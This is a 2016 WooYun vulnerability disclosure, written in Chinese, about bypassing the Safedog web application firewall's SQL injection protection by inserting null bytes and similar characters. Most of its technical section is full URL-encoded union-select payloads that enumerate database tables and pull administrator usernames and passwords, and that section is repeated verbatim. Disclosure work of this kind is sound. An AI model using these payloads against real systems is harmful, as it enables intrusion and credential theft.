当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169777

漏洞标题:安全狗SQL注入可被绕过

相关厂商:安全狗

漏洞作者: 路人甲

提交时间:2016-01-14 09:51

修复时间:2016-04-11 16:08

公开时间:2016-04-11 16:08

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-09: 细节向核心白帽子及相关领域专家公开
2016-03-19: 细节向普通白帽子公开
2016-03-29: 细节向实习白帽子公开
2016-04-11: 细节向公众公开

简要描述:

完全绕过,直取管理账户密码

详细说明:

首先来张1 union select user()被狗拦截图片:

anquangou.png


绕过方法http://**.**.**.**/bugs/wooyun-2015-0163236提到一种,但是不全是--的原因,%00替换%20也是可以的
1.获取表的语句,将下图--后使用%00发现可以获取数据

**.**.**.**/select.php?inject_string=--%00%27+union%20select%20GROUP_CONCAT(DISTINCT%20table_name)%20from%20information_schema.tables%20where%20table_schema=0x73716C6F6C%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


anquangou1.jpg


2.直接获取管理员账户密码:

**.**.**.**/select.php?inject_string=--%00%27+union%20select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


anquangou2.jpg


3.最后我遍历了下%00-%ff,发现如下均可绕过

2b
7c
00
20


aoguo.png

漏洞证明:

首先来张1 union select user()被狗拦截图片:

anquangou.png


绕过方法http://**.**.**.**/bugs/wooyun-2015-0163236提到一种,但是不全是--的原因,%00替换%20也是可以的
1.获取表的语句,将下图--后使用%00发现可以获取数据

**.**.**.**/select.php?inject_string=--%00%27+union%20select%20GROUP_CONCAT(DISTINCT%20table_name)%20from%20information_schema.tables%20where%20table_schema=0x73716C6F6C%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


anquangou1.jpg


2.直接获取管理员账户密码:

**.**.**.**/select.php?inject_string=--%00%27+union%20select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


anquangou2.jpg


3.最后我遍历了下%00-%ff,发现如下均可绕过

2b
7c
00
20


aoguo.png

修复方案:

限制

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-14 13:54

厂商回复:

感谢提交,感谢,感谢。

最新状态:

暂无